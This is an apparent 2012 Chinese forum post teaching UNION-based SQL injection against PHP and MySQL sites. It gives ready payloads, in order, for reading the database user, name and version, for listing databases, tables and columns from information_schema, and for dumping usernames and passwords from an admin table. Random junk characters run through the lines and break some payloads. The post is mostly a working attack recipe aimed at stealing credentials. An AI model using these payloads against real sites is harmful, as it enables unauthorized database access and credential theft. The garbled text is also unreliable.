2 x8 h* x& Z, l. [5 D# N教程内容:Mysql 5+php 注入
' g, v9 W/ D1 D4 Z1 G: U
: f& l$ Y" }9 _1 v% G* z1 Y" T! ^! q
- ^5 F5 q' o3 v+ X9 a
一.查看MYSQL基本信息(库名,版本,用户)
% K' ?) G# u: |
2 a9 [3 q) p5 W( o! n! {7 p% |" pand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*- {& D6 ^4 v' p1 ]2 Z
7 F& ]7 W! R* x' o) i二.查数据库
5 x4 R+ G5 J- S0 v& L- o
+ P1 U/ y8 M) z' mand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
* R i* }: P8 n6 F) rlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
% r7 p, D. T( Q9 ?
* f8 G( p0 R& w3 b% S8 L0 V3 W三.暴表
+ h( Y: v+ s3 o1 A( b R
4 d; l. p$ Q. H5 n7 w- Gand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*0 `' P4 l# ^/ f! L+ P
Q9 ~+ q! p; d% y
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。8 z$ I9 |& Z8 g
8 k- C7 e* V C, b2 M- y: v四.暴字段) G0 D6 b0 T: |! d1 ]7 U
, P- ]+ U6 R. e! Jand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*: h" H& K4 u) n7 Z# F
+ k0 O5 |6 q V7 c9 x9 C$ m
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
+ b+ D% B0 z# {5 L; }* a5 I* n x
! a, E7 z0 M5 u/ @五.暴数据5 R6 |/ ]3 X6 Y* A) `' \
$ _* D5 R: ]* \
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*6 h. a0 e- c2 ?9 E$ Q/ ]6 q$ Q% `
. o. p2 m0 }0 }- V+ I
1 F5 A+ L& D7 m' i7 E& x% S* \这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。7 m+ \ g! _1 b6 N
|
发表于 2012-9-13 16:27:53
收藏
支持
反对